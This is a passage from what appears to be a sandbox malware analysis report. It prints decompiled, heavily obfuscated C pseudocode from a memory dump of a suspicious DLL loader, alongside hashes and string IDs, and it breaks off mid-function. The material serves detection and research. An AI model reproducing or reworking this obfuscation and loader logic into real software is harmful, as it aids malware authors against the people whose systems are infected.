                          				_v1116 = 0xb7d7ba;
                          				_v1116 = _v1116 >> 3;
                          				_v1116 = _v1116 * 0x45;
                          				_v1116 = _v1116 ^ 0x0637cdcd;
                          				_v1064 = 0x633f3;
                          				_t288 = 7;
                          				_v1064 = _v1064 / _t288;
                          				_v1064 = _v1064 ^ 0x000e68da;
                          				_v1044 = 0x68e137;
                          				_v1044 = _v1044 >> 8;
                          				_v1044 = _v1044 ^ 0x000f94d8;
                          				_v1104 = 0x560a82;
                          				_t289 = 0x4d;
                          				_v1104 = _v1104 * 0x12;
                          				_v1104 = _v1104 << 0xa;
                          				_v1104 = _v1104 ^ 0x32f73e43;
                          				_v1128 = 0x20b49c;
                          				_v1128 = _v1128 + 0xffff9350;
                          				_v1128 = _v1128 / _t289;
                          				_v1128 = _v1128 + 0xffff69f1;
                          				_v1128 = _v1128 ^ 0xfff8ef71;
                          				_v1144 = 0xda057e;
                          				_v1144 = _v1144 | 0x61d5fb11;
                          				_v1144 = _v1144 + 0x9b0d;
                          				_t290 = 0x47;
                          				_v1144 = _v1144 / _t290;
                          				_v1144 = _v1144 ^ 0x016fc7d6;
                          				_v1108 = 0xd954d9;
                          				_v1108 = _v1108 >> 3;
                          				_v1108 = _v1108 * 0x2a;
                          				_v1108 = _v1108 ^ 0x047d2f3f;
                          				_v1084 = 0xee9532;
                          				_v1084 = _v1084 | 0x01e1ea12;
                          				_v1084 = _v1084 * 0x5e;
                          				_v1084 = _v1084 ^ 0xb61982a0;
                          				_v1136 = 0x9da312;
                          				_v1136 = _v1136 * 0xb;
                          				_v1136 = _v1136 + 0xfaec;
                          				_v1136 = _v1136 << 4;
                          				_v1136 = _v1136 ^ 0x6c675c41;
                          				_v1048 = 0x5b4722;
                          				_v1048 = _v1048 + 0x58c6;
                          				_v1048 = _v1048 ^ 0x0051fe1e;
                          				_v1140 = 0xb81c47;
                          				_v1140 = _v1140 | 0xf47f3da9;
                          				_v1140 = _v1140 + 0xffffb1b6;
                          				_v1140 = _v1140 * 0x52;
                          				_v1140 = _v1140 ^ 0x79a8ba01;
                          				_v1100 = 0x4ec91e;
                          				_v1100 = _v1100 + 0xffff658a;
                          				_v1100 = _v1100 + 0xa7da;
                          				_v1100 = _v1100 ^ 0x004d9e7a;
                          				_v1056 = 0xd22e34;
                          				_v1056 = _v1056 * 0x39;
                          				_v1056 = _v1056 ^ 0x2eccf222;
                          				_v1092 = 0x4415ff;
                          				_v1092 = _v1092 << 0xc;
                          				_v1092 = _v1092 + 0xffffcb4f;
                          				_v1092 = _v1092 ^ 0x4156ca29;
                          				_v1112 = 0xebdea7;
                          				_v1112 = _v1112 + 0xffff30b5;
                          				_v1112 = _v1112 ^ 0x44658fef;
                          				_v1112 = _v1112 ^ 0x4481ff75;
                          				_v1132 = 0x210e2f;
                          				_v1132 = _v1132 + 0x4766;
                          				_v1132 = _v1132 >> 6;
                          				_t291 = 0x78;
                          				_v1132 = _v1132 / _t291;
                          				_v1132 = _v1132 ^ 0x000739d3;
                          				_v1072 = 0xec15b6;
                          				_v1072 = _v1072 + 0xf74;
                          				_v1072 = _v1072 ^ 0x00e11cf3;
                          				_v1096 = 0xda8ada;
                          				_v1096 = _v1096 >> 0xe;
                          				_v1096 = _v1096 * 0x4f;
                          				_v1096 = _v1096 ^ 0x00036eb4;
                          				_v1120 = 0x69db3;
                          				_v1120 = _v1120 + 0x311c;
                          				_v1120 = _v1120 << 2;
                          				_v1120 = _v1120 ^ 0x00187b2b;
                          				_v1068 = 0x7459e2;
                          				_v1068 = _v1068 >> 8;
                          				_v1068 = _v1068 ^ 0x000d8df4;
                          				_v1060 = 0x7a5957;
                          				_v1060 = _v1060 + 0x9cd0;
                          				_v1060 = _v1060 ^ 0x007b6b01;
                          				_v1088 = 0xc3c012;
                          				_v1088 = _v1088 >> 0x10;
                          				_v1088 = _v1088 << 5;
                          				_v1088 = _v1088 ^ 0x00089583;
                          				_v1124 = 0x7ac281;
                          				_v1124 = _v1124 >> 0xa;
                          				_v1124 = _v1124 >> 0xf;
                          				_v1124 = _v1124 + 0xc97f;
                          				_v1124 = _v1124 ^ 0x00055573;
                          				_v1052 = 0x890174;
                          				_v1052 = _v1052 + 0xa006;
                          				_v1052 = _v1052 ^ 0x008bc550;
                          				_v1080 = 0xeb1cb6;
                          				_v1080 = _v1080 ^ 0x4b3beb78;
                          				_v1080 = _v1080 >> 0x10;
                          				_v1080 = _v1080 ^ 0x00025049;
                          				while(_t260 != 0x3b56309) {
                          					if(_t260 == 0x7219719) {
                          						E00D4DC71();
                          						L8:
                          						_t260 = 0x9bc0f5a;
                          						continue;
                          					}
                          					if(_t260 == 0x9631a61) {
                          						_t249 = E00D409DD(_v1060,  &_v1040, _v1088, _v1124);
                          						__eflags = 0;
                          						 *_t249 = 0;
                          						return E00D3856E( &_v1040, _v1052, _v1080);
                          					}
                          					if(_t260 == 0x9bc0f5a) {
                          						_push(_v1128);
                          						_push(_v1104);
                          						_push(_v1044);
                          						_t251 = E00D4E1F8(0xd31000, _v1064, __eflags);
                          						_t267 =  *0xd56214; // 0x0
                          						_t253 =  *0xd56214; // 0x0
                          						E00D52D0A(_v1108, __eflags, _t253 + 0x23c, _v1084, _v1136, _v1048, _t267 + 0x34,  &_v1040, _t267 + 0x34, _t251);
                          						E00D4FECB(_t251, _v1140, _v1100, _v1056, _v1092);
                          						_t294 =  &(_t294[0xe]);
                          						_t260 = 0x3b56309;
                          						continue;
                          					}
                          					if(_t260 == 0xa27996a) {
                          						_t257 =  *0xd56214; // 0x0
                          						__eflags =  *((intOrPtr*)(_t257 + 0x20));
                          						_t260 =  !=  ? 0xb537953 : 0x7219719;
                          						continue;
                          					}
                          					if(_t260 != 0xb537953) {
                          						L13:
                          						__eflags = _t260 - 0xf6a818b;
                          						if(__eflags != 0) {
                          							continue;
                          						}
                          						return _t257;
                          					}
                          					_t257 = E00D3A445();
                          					goto L8;
                          				}
                          				E00D31CA1(_v1112, _v1132, _v1072,  &_v520);
                          				E00D4654A(_v1096, _v1120, __eflags,  &_v1040, _v1068,  &_v520);
                          				_t294 =  &(_t294[5]);
                          				_t260 = 0x9631a61;
                          				goto L13;
                          			}










































                          0x00d42b84
                          0x00d42b8d
                          0x00d42b91
                          0x00d42b99
                          0x00d42b9e
                          0x00d42bc3
                          0x00d42bd6
                          0x00d42bf0
                          0x00d42bf5
                          0x00d42bf8
                          0x00000000
                          0x00d42bf8
                          0x00d42b5d
                          0x00d42b74
                          0x00d42b7b
                          0x00d42b7f
                          0x00000000
                          0x00d42b7f
                          0x00d42b61
                          0x00d42c52
                          0x00d42c52
                          0x00d42c58
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00d42c58
                          0x00d42b6b
                          0x00000000
                          0x00d42b6b
                          0x00d42c24
                          0x00d42c45
                          0x00d42c4a
                          0x00d42c4d
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: "G[$7h$A\gl$ME$WYz$fG$x;K$Yt
                          • API String ID: 0-2581693823
                          • Opcode ID: d5c423a0358af61b3cf61eba85f547ceedc2e2e6be1ae531ce2208a70f66efb3
                          • Instruction ID: 528445111fac8ceb7e547706bf3913013b7535addd37374bde5134a02edc7d5d
                          • Opcode Fuzzy Hash: d5c423a0358af61b3cf61eba85f547ceedc2e2e6be1ae531ce2208a70f66efb3
                          • Instruction Fuzzy Hash: FBC10BB14093419FC368CF25C58A51BBBF1FBC4758F508A2DF29696260D7B18A09CF92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 92%
                          			E00D53263(void* __ecx, void* __edx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
                          				signed int _v4;
                          				signed int _v8;
                          				signed int _v12;
                          				signed int _v16;
                          				signed int _v20;
                          				signed int _v24;
                          				signed int _v28;
                          				signed int _v32;
                          				signed int _v36;
                          				signed int _v40;
                          				signed int _v44;
                          				signed int _v48;
                          				signed int _v52;
                          				signed int _v56;
                          				signed int _v60;
                          				void* _t171;
                          				void* _t188;
                          				void* _t198;
                          				void* _t200;
                          				signed int _t202;
                          				signed int _t203;
                          				signed int _t204;
                          				signed int _t205;
                          				signed int _t206;
                          				signed int _t207;
                          				void* _t233;
                          				void* _t238;
                          				signed int* _t242;
                          				signed int* _t243;
                          				signed int* _t244;
                          
                          				_push(_a16);
                          				_t240 = _a4;
                          				_push(0);
                          				_push(_a8);
                          				_push(_a4);
                          				_push(__edx);
                          				_push(__ecx);
                          				E00D4FE29(_t171);
                          				_v52 = 0x577e5f;
                          				_v52 = _v52 >> 2;
                          				_v52 = _v52 >> 2;
                          				_t202 = 0x5a;
                          				_v52 = _v52 / _t202;
                          				_v52 = _v52 ^ 0x00001f8d;
                          				_v56 = 0xc1a783;
                          				_v56 = _v56 | 0xd091f394;
                          				_t203 = 0x7d;
                          				_v56 = _v56 / _t203;
                          				_v56 = _v56 >> 0xa;
                          				_v56 = _v56 ^ 0x00004aea;
                          				_v36 = 0x5ab329;
                          				_v36 = _v36 | 0xfb978afd;
                          				_v36 = _v36 << 0xc;
                          				_v36 = _v36 << 5;
                          				_v36 = _v36 ^ 0x77fa0040;
                          				_v60 = 0xfb6851;
                          				_t204 = 0x5f;
                          				_v60 = _v60 / _t204;
                          				_v60 = _v60 + 0xffff827f;
                          				_v60 = _v60 + 0xffffffdf;
                          				_v60 = _v60 ^ 0x000cafd7;
                          				_v24 = 0xe59b9d;
                          				_v24 = _v24 + 0x8cf1;
                          				_v24 = _v24 << 0xd;
                          				_v24 = _v24 ^ 0xc51da5fe;
                          				_v40 = 0x4a3359;
                          				_v40 = _v40 + 0xb1f1;
                          				_v40 = _v40 ^ 0xc176e2ad;
                          				_v40 = _v40 << 0xb;
                          				_v40 = _v40 ^ 0xe0393f27;
                          				_v44 = 0x442ad8;
                          				_v44 = _v44 + 0xffffa8db;
                          				_v44 = _v44 ^ 0xa2d0149a;
                          				_v44 = _v44 | 0x2bbd0b31;
                          				_v44 = _v44 ^ 0xabb0f764;
                          				_v20 = 0x80424;
                          				_v20 = _v20 + 0xffff6539;
                          				_v20 = _v20 + 0xd5f9;
                          				_v20 = _v20 ^ 0x000cf2ae;
                          				_v48 = 0x677157;
                          				_v48 = _v48 + 0xec21;
                          				_v48 = _v48 ^ 0x036b165d;
                          				_t205 = 0x14;
                          				_v48 = _v48 / _t205;
                          				_v48 = _v48 ^ 0x002fc559;
                          				_v16 = 0xa7ae7b;
                          				_v16 = _v16 | 0x7198ce36;
                          				_v16 = _v16 << 1;
                          				_v16 = _v16 ^ 0xe373c07b;
                          				_v32 = 0xbd3d32;
                          				_v32 = _v32 | 0x84fa4a87;
                          				_v32 = _v32 * 0xf;
                          				_t206 = 0x34;
                          				_v32 = _v32 * 0x4e;
                          				_v32 = _v32 ^ 0xd7bdec0b;
                          				_v8 = 0x4158ae;
                          				_v8 = _v8 / _t206;
                          				_v8 = _v8 ^ 0x000847ec;
                          				_v28 = 0x8e7645;
                          				_v28 = _v28 + 0xffff0216;
                          				_v28 = _v28 + 0x7276;
                          				_t207 = 0x60;
                          				_v28 = _v28 * 0x4a;
                          				_v28 = _v28 ^ 0x290f0829;
                          				_v4 = 0x80a154;
                          				_v4 = _v4 ^ 0x762c831e;
                          				_v4 = _v4 ^ 0x76a70d93;
                          				_v12 = 0x206e81;
                          				_v12 = _v12 / _t207;
                          				_v12 = _v12 + 0xffffa107;
                          				_v12 = _v12 ^ 0xffff9c06;
                          				_t208 = _v60;
                          				_t188 = E00D5287F(_v60, _a4, _v24);
                          				_t198 = _t188;
                          				_t242 =  &(( &_v60)[7]);
                          				if(_t198 != 0) {
                          					_t233 = E00D462C7( *((intOrPtr*)(_t198 + 0x50)), _v36, _v40, _t208, _v44, _v20, _v48, _v56 | _v52);
                          					_t243 =  &(_t242[6]);
                          					if(_t233 == 0) {
                          						L6:
                          						return _t233;
                          					}
                          					E00D4C9B0(_v16, _t233, _v32,  *((intOrPtr*)(_t198 + 0x54)),  *_t240, _v8);
                          					_t244 =  &(_t243[4]);
                          					_t238 = ( *(_t198 + 0x14) & 0x0000ffff) + 0x18 + _t198;
                          					_t200 = ( *(_t198 + 6) & 0x0000ffff) * 0x28 + _t238;
                          					while(_t238 < _t200) {
                          						_t196 =  <  ?  *((void*)(_t238 + 8)) :  *((intOrPtr*)(_t238 + 0x10));
                          						E00D4C9B0(_v28,  *((intOrPtr*)(_t238 + 0xc)) + _t233, _v4,  <  ?  *((void*)(_t238 + 8)) :  *((intOrPtr*)(_t238 + 0x10)),  *_t240 +  *((intOrPtr*)(_t238 + 0x14)), _v12);
                          						_t244 =  &(_t244[4]);
                          						_t238 = _t238 + 0x28;
                          					}
                          					goto L6;
                          				}
                          				return _t188;
                          			}


































                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: !$$P$'?9$@$Wqg$_~W$vr$J
                          • API String ID: 0-3966742547
                          • Opcode ID: fef6665b2dcae0e8f76fd5e1b4eb73354bf8a0be14dccf9d357c285fbdd5a555
                          • Instruction ID: 9521c61068cf00a0906b814f2284afd67343138719fa4805b3622d0fe8a46c66
                          • Opcode Fuzzy Hash: fef6665b2dcae0e8f76fd5e1b4eb73354bf8a0be14dccf9d357c285fbdd5a555
                          • Instruction Fuzzy Hash: 67813072508340AFC358CF66C88A81BBBF2FBC5758F149A1DF99986260D3B6D945CF06
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 93%
                          			E00D517BD(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
                          				char _v520;
                          				char _v1040;
                          				char _v1560;
                          				intOrPtr _v1564;
                          				intOrPtr _v1568;
                          				intOrPtr _v1572;
                          				intOrPtr _v1576;
                          				signed int _v1580;
                          				signed int _v1584;
                          				signed int _v1588;
                          				signed int _v1592;
                          				signed int _v1596;
                          				signed int _v1600;
                          				signed int _v1604;
                          				signed int _v1608;
                          				signed int _v1612;
                          				signed int _v1616;
                          				signed int _v1620;
                          				signed int _v1624;
                          				signed int _v1628;
                          				signed int _v1632;
                          				signed int _v1636;
                          				signed int _v1640;
                          				signed int _v1644;
                          				signed int _v1648;
                          				signed int _v1652;
                          				signed int _v1656;
                          				signed int _v1660;
                          				signed int _v1664;
                          				signed int _v1668;
                          				signed int _v1672;
                          				signed int _v1676;
                          				signed int _v1680;
                          				signed int _v1684;
                          				signed int _v1688;
                          				signed int _v1692;
                          				signed int _v1696;
                          				signed int _v1700;
                          				signed int _v1704;
                          				signed int _v1708;
                          				signed int _v1712;
                          				signed int _v1716;
                          				signed int _v1720;
                          				signed int _v1724;
                          				signed int _v1728;
                          				void* _t369;
                          				void* _t397;
                          				intOrPtr _t400;
                          				intOrPtr _t402;
                          				void* _t412;
                          				intOrPtr _t415;
                          				intOrPtr _t419;
                          				void* _t425;
                          				intOrPtr _t462;
                          				signed int _t463;
                          				signed int _t464;
                          				signed int _t465;
                          				signed int _t466;
                          				signed int _t467;
                          				signed int _t468;
                          				signed int _t469;
                          				signed int _t470;
                          				signed int* _t475;
                          
                          				_push(_a8);
                          				_t462 = 0;
                          				_push(_a4);
                          				_push(0);
                          				_push(__ecx);
                          				E00D4FE29(_t369);
                          				_v1576 = 0x13bb59;
                          				_t475 =  &(( &_v1728)[4]);
                          				_v1572 = 0x74d317;
                          				_v1568 = 0x8520ae;
                          				_t425 = 0xbbc45e7;
                          				_v1564 = 0;
                          				_v1636 = 0xff081c;
                          				_v1636 = _v1636 + 0xffff5aa8;
                          				_v1636 = _v1636 | 0xdf687e40;
                          				_v1636 = _v1636 ^ 0xdffe7eed;
                          				_v1592 = 0x1eb670;
                          				_t463 = 3;
                          				_v1592 = _v1592 / _t463;
                          				_v1592 = _v1592 ^ 0x000911f1;
                          				_v1588 = 0xd7f028;
                          				_v1588 = _v1588 + 0x99cf;
                          				_v1588 = _v1588 ^ 0x00d6a0ad;
                          				_v1668 = 0xda1be6;
                          				_v1668 = _v1668 >> 0xa;
                          				_v1668 = _v1668 + 0xb82c;
                          				_v1668 = _v1668 + 0xffff3cb9;
                          				_v1668 = _v1668 ^ 0x000447cb;
                          				_v1700 = 0x2ba1ed;
                          				_v1700 = _v1700 << 6;
                          				_v1700 = _v1700 + 0xffff6a87;
                          				_v1700 = _v1700 >> 0xf;
                          				_v1700 = _v1700 ^ 0x000ca1a2;
                          				_v1600 = 0xfc0906;
                          				_v1600 = _v1600 >> 0xe;
                          				_v1600 = _v1600 ^ 0x000a9240;
                          				_v1692 = 0xcdddf3;
                          				_v1692 = _v1692 | 0x4624ceaf;
                          				_v1692 = _v1692 >> 0xc;
                          				_v1692 = _v1692 | 0xae0b3fef;
                          				_v1692 = _v1692 ^ 0xae09d891;
                          				_v1652 = 0xd6e5ef;
                          				_v1652 = _v1652 + 0xffffecd6;
                          				_t464 = 0x1f;
                          				_v1652 = _v1652 * 0x1b;
                          				_v1652 = _v1652 ^ 0x16a7acad;
                          				_v1724 = 0x640b42;
                          				_v1724 = _v1724 + 0x7af0;
                          				_v1724 = _v1724 + 0xd7a0;
                          				_v1724 = _v1724 / _t464;
                          				_v1724 = _v1724 ^ 0x00003baa;
                          				_v1644 = 0x5d7e02;
                          				_v1644 = _v1644 ^ 0x280f1fa3;
                          				_v1644 = _v1644 | 0x80dcb776;
                          				_v1644 = _v1644 ^ 0xa8d7b48e;
                          				_v1612 = 0x310401;
                          				_v1612 = _v1612 << 0xc;
                          				_v1612 = _v1612 ^ 0x10456323;
                          				_v1708 = 0xec7d3e;
                          				_v1708 = _v1708 + 0xffff4756;
                          				_t465 = 0x19;
                          				_v1708 = _v1708 / _t465;
                          				_v1708 = _v1708 * 0x78;
                          				_v1708 = _v1708 ^ 0x04625198;
                          				_v1676 = 0xc1499c;
                          				_v1676 = _v1676 + 0x787f;
                          				_v1676 = _v1676 >> 7;
                          				_v1676 = _v1676 >> 0xd;
                          				_v1676 = _v1676 ^ 0x0006bbad;
                          				_v1620 = 0xc8864f;
                          				_v1620 = _v1620 + 0xdb64;
                          				_t466 = 0x71;
                          				_v1620 = _v1620 / _t466;
                          				_v1620 = _v1620 ^ 0x00054ec4;
                          				_v1716 = 0x58bfc6;
                          				_v1716 = _v1716 << 0xc;
                          				_v1716 = _v1716 << 6;
                          				_v1716 = _v1716 >> 0xa;
                          				_v1716 = _v1716 ^ 0x00309503;
                          				_v1584 = 0x2a66b4;
                          				_t467 = 0x6c;
                          				_v1584 = _v1584 * 0x62;
                          				_v1584 = _v1584 ^ 0x103c6d70;
                          				_v1628 = 0xcd0e9a;
                          				_v1628 = _v1628 + 0xffff6b98;
                          				_v1628 = _v1628 + 0xffffdc7c;
                          				_v1628 = _v1628 ^ 0x00cd4883;
                          				_v1684 = 0x7bfe73;
                          				_v1684 = _v1684 >> 5;
                          				_v1684 = _v1684 << 7;
                          				_v1684 = _v1684 * 0x31;
                          				_v1684 = _v1684 ^ 0x5ee8daf9;
                          				_v1660 = 0x1f1c01;
                          				_v1660 = _v1660 >> 4;
                          				_v1660 = _v1660 / _t467;
                          				_v1660 = _v1660 ^ 0x000ccbd2;
                          				_v1720 = 0x840fb2;
                          				_v1720 = _v1720 | 0xa69eff81;
                          				_v1720 = _v1720 << 0xe;
                          				_v1720 = _v1720 + 0xffff3037;
                          				_v1720 = _v1720 ^ 0xbfecb97e;
                          				_v1656 = 0xd8a297;
                          				_v1656 = _v1656 + 0x41c1;
                          				_v1656 = _v1656 ^ 0x1d9d441b;
                          				_v1656 = _v1656 ^ 0x1d437da6;
                          				_v1580 = 0xe77586;
                          				_v1580 = _v1580 + 0xfffff7e8;
                          				_v1580 = _v1580 ^ 0x00e53b2f;
                          				_v1728 = 0x20c0e;
                          				_v1728 = _v1728 + 0x594f;
                          				_t468 = 0x79;
                          				_v1728 = _v1728 / _t468;
                          				_v1728 = _v1728 ^ 0x017ec3a2;
                          				_v1728 = _v1728 ^ 0x01734834;
                          				_v1712 = 0x467deb;
                          				_v1712 = _v1712 | 0xfb06902d;
                          				_v1712 = _v1712 << 0xd;
                          				_v1712 = _v1712 << 0xb;
                          				_v1712 = _v1712 ^ 0xef0dc14e;
                          				_v1632 = 0xa85c1c;
                          				_v1632 = _v1632 << 3;
                          				_v1632 = _v1632 << 4;
                          				_v1632 = _v1632 ^ 0x54293107;
                          				_v1596 = 0x697bfe;
                          				_v1596 = _v1596 | 0x748d72c7;
                          				_v1596 = _v1596 ^ 0x74e3de32;
                          				_v1640 = 0x724245;
                          				_t222 =  &_v1640; // 0x724245
                          				_v1640 =  *_t222 * 0x4c;
                          				_t224 =  &_v1640; // 0x724245
                          				_v1640 =  *_t224 * 0x26;
                          				_v1640 = _v1640 ^ 0x08f66fe6;
                          				_v1648 = 0xa241b2;
                          				_v1648 = _v1648 >> 4;
                          				_v1648 = _v1648 << 0xe;
                          				_v1648 = _v1648 ^ 0x890355d2;
                          				_v1604 = 0x4e61c6;
                          				_v1604 = _v1604 | 0x297abf50;
                          				_v1604 = _v1604 ^ 0x29742082;
                          				_v1608 = 0xdfdd08;
                          				_v1608 = _v1608 | 0x096e656f;
                          				_v1608 = _v1608 ^ 0x09fe8e74;
                          				_v1624 = 0x7e1789;
                          				_v1624 = _v1624 + 0xd6ac;
                          				_v1624 = _v1624 + 0xffff1ac7;
                          				_v1624 = _v1624 ^ 0x007fce14;
                          				_v1688 = 0xd4150c;
                          				_v1688 = _v1688 << 3;
                          				_v1688 = _v1688 ^ 0x561d7592;
                          				_v1688 = _v1688 >> 0xa;
                          				_v1688 = _v1688 ^ 0x001f305a;
                          				_v1696 = 0x3e923d;
                          				_v1696 = _v1696 ^ 0x624df4c6;
                          				_t469 = 0x29;
                          				_v1696 = _v1696 / _t469;
                          				_v1696 = _v1696 + 0xffffe680;
                          				_v1696 = _v1696 ^ 0x026755ff;
                          				_v1704 = 0xed73af;
                          				_t470 = 0x36;
                          				_v1704 = _v1704 / _t470;
                          				_v1704 = _v1704 * 0x76;
                          				_v1704 = _v1704 >> 3;
                          				_v1704 = _v1704 ^ 0x0041c6e0;
                          				_v1664 = 0xe0489c;
                          				_v1664 = _v1664 * 0x4e;
                          				_v1664 = _v1664 * 0x21;
                          				_v1664 = _v1664 << 0xf;
                          				_v1664 = _v1664 ^ 0x084e6c7b;
                          				_v1672 = 0xcef4bd;
                          				_v1672 = _v1672 * 0x4b;
                          				_v1672 = _v1672 + 0xffff3dcb;
                          				_v1672 = _v1672 << 0x10;
                          				_v1672 = _v1672 ^ 0xf1249f73;
                          				_v1680 = 0x187dc5;
                          				_v1680 = _v1680 | 0x94fddf65;
                          				_v1680 = _v1680 << 1;
                          				_v1680 = _v1680 ^ 0x244f0190;
                          				_v1680 = _v1680 ^ 0x0db75cb9;
                          				_v1616 = 0xe6e563;
                          				_v1616 = _v1616 ^ 0xa5d4beb7;
                          				_v1616 = _v1616 + 0xffffcebd;
                          				_v1616 = _v1616 ^ 0xa53dba5b;
                          				do {
                          					while(_t425 != 0x6a96cc9) {
                          						if(_t425 == 0xabcd6f9) {
                          							_push(_t425);
                          							__eflags = E00D485FF(_v1664, _v1672, __eflags, _t462,  &_v520, _t462, _v1680, _t462, _v1616);
                          							_t462 =  !=  ? 1 : _t462;
                          						} else {
                          							if(_t425 == 0xbbc45e7) {
                          								E00D31A34(_v1592,  &_v1040, _t425, _t425, _v1588, _v1668, _v1700, _t425, _v1636, _v1600);
                          								_t475 =  &(_t475[8]);
                          								_t425 = 0xe9b1f6b;
                          								continue;
                          							} else {
                          								_t482 = _t425 - 0xe9b1f6b;
                          								if(_t425 != 0xe9b1f6b) {
                          									goto L8;
                          								} else {
                          									_push(_v1644);
                          									_push(_v1724);
                          									_push(_v1652);
                          									_t412 = E00D4E1F8(0xd31030, _v1692, _t482);
                          									E00D37078( &_v1560, _t482);
                          									_t415 =  *0xd56214; // 0x0
                          									_t419 =  *0xd56214; // 0x0
                          									E00D3F96F(_v1612, _t482, _t419 + 0x34, _t412,  &_v1560, _v1708,  &_v520, _t415 + 0x23c, _v1676, _v1620, _v1716,  &_v1040);
                          									E00D4FECB(_t412, _v1584, _v1628, _v1684, _v1660);
                          									_t475 =  &(_t475[0x10]);
                          									_t425 = 0xabcd6f9;
                          									continue;
                          								}
                          							}
                          						}
                          						L11:
                          						return _t462;
                          					}
                          					_push(_v1728);
                          					_t346 =  &_v1580; // 0xe53b2f
                          					_push( *_t346);
                          					_push(_v1656);
                          					_t397 = E00D4E1F8(0xd310f0, _v1720, __eflags);
                          					E00D37078( &_v1560, __eflags);
                          					_t400 =  *0xd56214; // 0x0
                          					_t402 =  *0xd56214; // 0x0
                          					__eflags = _t402 + 0x23c;
                          					E00D3BF5F(_v1712, _t402 + 0x23c, _v1632,  &_v1560, _v1596,  &_v520, _v1640,  &_v1040, _t402 + 0x23c, _v1648, _t400 + 0x34, _v1604, _v1608,  &_v1560, _t462);
                          					E00D4FECB(_t397, _v1624, _v1688, _v1696, _v1704);
                          					_t475 =  &(_t475[0x13]);
                          					_t425 = 0xabcd6f9;
                          					L8:
                          					__eflags = _t425 - 0xcc0d361;
                          				} while (__eflags != 0);
                          				goto L11;
                          			}


                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: /;$>}$EBr$OY$c$oen$}F
                          • API String ID: 0-419207597
                          • Opcode ID: 43108b1f803d510538acc92f65f388f524d1569aa1d14e9d46e2b22fbd40fc9b
                          • Instruction ID: 74efcc0afff2537be4f0d24960ffdf7777a134459fcd3aa78b776bd940dc2be1
                          • Opcode Fuzzy Hash: 43108b1f803d510538acc92f65f388f524d1569aa1d14e9d46e2b22fbd40fc9b
                          • Instruction Fuzzy Hash: B40202B15083809BD764CF25C88AA8BBBE1FBC4358F104A1DF6CA96260D7B58949CF53
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 96%
                          			E00D377A3(signed int* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                          				char _v60;
                          				signed int _v64;
                          				signed int _v68;
                          				unsigned int _v72;
                          				signed int _v76;
                          				signed int _v80;
                          				signed int _v84;
                          				signed int _v88;
                          				signed int _v92;
                          				signed int _v96;
                          				signed int _v100;
                          				signed int _v104;
                          				signed int _v108;
                          				signed int _v112;
                          				signed int _v116;
                          				signed int _v120;
                          				signed int _v124;
                          				signed int _v128;
                          				signed int _v132;
                          				signed int _v136;
                          				signed int _v140;
                          				signed int _v144;
                          				signed int _v148;
                          				signed int _v152;
                          				signed int _v156;
                          				signed int _v160;
                          				signed int _v164;
                          				signed int _v168;
                          				signed int _v172;
                          				signed int _v176;
                          				signed int _v180;
                          				signed int _v184;
                          				signed int _v188;
                          				signed int _v192;
                          				void* _t314;
                          				signed int _t352;
                          				signed int _t362;
                          				signed int _t363;
                          				signed int _t364;
                          				signed int _t365;
                          				signed int _t366;
                          				signed int _t367;
                          				void* _t370;
                          				signed int* _t401;
                          				signed int* _t405;
                          				void* _t407;
                          
                          				_t402 = _a12;
                          				_push(_a12);
                          				_push(_a8);
                          				_t401 = __ecx;
                          				_push(_a4);
                          				_push(__ecx);
                          				E00D4FE29(_t314);
                          				_v100 = 0xaefbe1;
                          				_t405 =  &(( &_v192)[5]);
                          				_v100 = _v100 + 0x6b82;
                          				_t370 = 0xc5526f;
                          				_t362 = 0x2b;
                          				_v100 = _v100 / _t362;
                          				_v100 = _v100 ^ 0x00041443;
                          				_v80 = 0x1d3414;
                          				_v80 = _v80 + 0xffffdb02;
                          				_v80 = _v80 ^ 0x0011ba60;
                          				_v72 = 0x54a5f8;
                          				_v72 = _v72 >> 0x10;
                          				_v72 = _v72 ^ 0x000d0ae3;
                          				_v136 = 0x274773;
                          				_t26 =  &_v136; // 0x274773
                          				_t363 = 0x1a;
                          				_v136 =  *_t26 * 0x4d;
                          				_v136 = _v136 + 0xffff9993;
                          				_v136 = _v136 ^ 0x0bd1637a;
                          				_v88 = 0xd58b4c;
                          				_v88 = _v88 + 0xffff1506;
                          				_v88 = _v88 ^ 0x00d01948;
                          				_v92 = 0x5e6930;
                          				_t38 =  &_v92; // 0x5e6930
                          				_v92 =  *_t38;
                          				_v92 = _v92 ^ 0x00540f59;
                          				_v116 = 0x40a51;
                          				_v116 = _v116 | 0x5ce3fa4e;
                          				_v116 = _v116 >> 2;
                          				_v116 = _v116 ^ 0x1737f89e;
                          				_v108 = 0x7d5bec;
                          				_v108 = _v108 | 0x0f0c5889;
                          				_v108 = _v108 + 0xbcf5;
                          				_v108 = _v108 ^ 0x0f7d2458;
                          				_v164 = 0x3d5dd8;
